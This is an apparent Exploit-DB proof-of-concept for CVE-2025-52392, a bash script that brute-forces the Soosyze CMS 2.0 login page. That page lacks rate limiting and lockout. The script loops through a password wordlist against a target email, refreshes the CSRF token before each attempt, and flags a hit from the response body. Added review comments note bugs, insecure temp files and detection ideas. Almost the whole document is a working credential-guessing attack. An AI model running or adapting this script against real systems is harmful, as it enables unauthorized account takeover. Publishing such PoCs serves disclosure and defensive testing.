Soosyze CMS 2.0 - Brute Force Login

EDB-ID:

52416




Platform:

Multiple

Date:

2025-08-18


# Exploit Title: Soosyze CMS 2.0 - Brute Force Login
# Google Dork: N/A
# Date: 2025-08-13
# Exploit Author: Beatriz Fresno Naumova (beafn28)
# Vendor Homepage: https://soosyze.com/
# Software Link: https://github.com/soosyze/soosyze
# Version: 2.0 (tested)
# Tested on: macOS Sonoma 14.x (Apple Silicon M1), /bin/bash 3.2 & Homebrew bash 5.2, curl 8.x, BSD sed
# CVE : CVE-2025-52392

# Description:
# Soosyze CMS 2.0 allows brute-force login attacks via /user/login due to missing rate limiting
# and account lockout mechanisms. An attacker can submit unlimited POST requests with a known
# username/email and a password wordlist, potentially gaining unauthorized access (CWE-307).

# PoC Usage:
#   ./script.sh [wordlist.txt]
# If no wordlist is provided, the built-in default list (DEFAULT_WORDS) is used.

#!/usr/bin/env bash
# NOTE(review): a shebang is only honoured when it is the first line of the
# file; here a comment header precedes it, so invoke as `bash script.sh`.

# Strict mode: abort on errors, unset variables and failed pipeline stages.
set -euo pipefail

# Target and form parameters; the defaults point at a local test instance.
BASE_URL="http://localhost:8000"
LOGIN_PATH="/user/login"
EMAIL_FIELD="email"
PASS_FIELD="password"
TARGET_EMAIL="test@test.com"

# Optional wordlist path from argv; an empty value selects DEFAULT_WORDS.
WORDLIST_FILE="${1:-}"
DEFAULT_WORDS=(
    "123456"
    "admin"
    "password"
    "qwerty"
    "letmein"
    "admin123"
    "password1"
)

form_url="${BASE_URL}${LOGIN_PATH}"
# Per-run cookie jar shared by every curl call; deleted at the end of the script.
COOKIE_JAR="$(mktemp)"

#######################################
# Fetch the login form and save the body to /tmp/login_page.html, using the
# shared cookie jar so later requests belong to the same session.
# Globals:   COOKIE_JAR, form_url (read)
# Arguments: none
# Outputs:   page body written to /tmp/login_page.html
# Returns:   curl's exit status
#######################################
get_form() {
    local -a curl_opts=(-sS -c "$COOKIE_JAR" -b "$COOKIE_JAR")
    # NOTE(review): fixed, predictable path in a shared /tmp; extract_token
    # reads this same name, so the two must stay in step.
    curl "${curl_opts[@]}" "$form_url" > /tmp/login_page.html
}

#######################################
# Find the first hidden input whose name contains "token" or "csrf" in the
# saved login page and print it as "<name><TAB><value>". Both fields are
# empty when no such input is found.
# Globals:   none (reads /tmp/login_page.html)
# Arguments: none
# Outputs:   one tab-separated line on stdout
# Returns:   0
#######################################
extract_token() {
    local page=/tmp/login_page.html
    local field_name field_value=""
    # sed works line by line, so name="…" and type="hidden" must share a line,
    # in that order. `|| true` keeps pipefail quiet when head closes the pipe.
    field_name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' "$page" | head -n1 || true)
    if [[ -z "$field_name" ]]; then
        printf '%s\t%s\n' "" ""
        return 0
    fi
    # The name is interpolated into an ERE; the character class above restricts
    # it to [_a-zA-Z0-9:-], none of which are regex metacharacters.
    field_value=$(sed -nE "s/.*name=\"$field_name\".*value=\"([^\"]*)\".*/\1/p" "$page" | head -n1 || true)
    printf '%s\t%s\n' "$field_name" "$field_value"
}

#######################################
# Submit one login attempt to $form_url and print the HTTP status code.
# Globals:   COOKIE_JAR, form_url, BASE_URL, EMAIL_FIELD, PASS_FIELD,
#            TARGET_EMAIL (all read)
# Arguments: $1 - password to submit
#            $2 - hidden token field name ("" when none was found)
#            $3 - hidden token field value ("" when none was found)
# Outputs:   response body to /tmp/resp.html (fixed path in shared /tmp);
#            curl's %{http_code} on stdout
# Returns:   curl's exit status
#######################################
post_login() {
    local pass="$1" tname="$2" tval="$3"
    # -X POST is redundant once --data-urlencode is given; Origin/Referer are
    # set to the site's own URL.
    curl -sS -o /tmp/resp.html -w "%{http_code}" \
        -c "$COOKIE_JAR" -b "$COOKIE_JAR" \
        -X POST "$form_url" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Origin: $BASE_URL" -H "Referer: $form_url" \
        --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" \
        --data-urlencode "$PASS_FIELD=$pass" \
        $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" )
        # ^ Unquoted substitution: word-splitting is what separates
        # '--data-urlencode' from 'name=value' here, so the expansion is also
        # subject to globbing and splits further if the value contains IFS
        # characters; it expands to nothing when either token part is empty.
}

echo "[*] Starting brute-force attack on $form_url"
# Wordlist selection. NOTE(review): `a && b || c` is not if/else — the fallback
# also runs if mapfile itself fails, and a readable-but-empty file leaves
# `words` empty, which `set -u` reports as unbound on bash < 4.4. mapfile
# needs bash 4+, so this line does not run on the /bin/bash 3.2 named in the
# header.
[[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}")

# One GET + one POST per candidate. Server-side, the missing rate limiting /
# account lockout named in the description (CWE-307) is the mitigation; a
# burst of POSTs to $LOGIN_PATH from one client is what log-based detection
# would key on.
i=0
for pw in "${words[@]}"; do
    i=$((i+1))
    # Re-fetch the form before every attempt (presumably so a hidden token, if
    # present, belongs to the current cookie-jar session — not confirmed here).
    get_form
    # extract_token prints "<name>\t<value>"; IFS=tab splits it into the two vars.
    IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token)
    code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE")

    # Success heuristic: the quoted literal "redirect" anywhere in the response
    # body. NOTE(review): any body containing that string counts as a hit.
    if grep -q '"redirect"' /tmp/resp.html; then
        # `echo -e` also interprets backslash escapes inside $pw itself.
        echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)"
        break
    else
        echo "[$i] '$pw' (HTTP $code)"
    fi

    # Random 0.1–0.9 s pause (RANDOM%9+1 is 1..9). Fractional sleep is a
    # GNU/BSD extension, not POSIX.
    sleep 0.$((RANDOM%9+1))
done

# Runs only on normal completion — there is no trap, so an interrupted run
# leaves the cookie jar behind, and /tmp/login_page.html is never removed.
rm -f "$COOKIE_JAR" /tmp/resp.html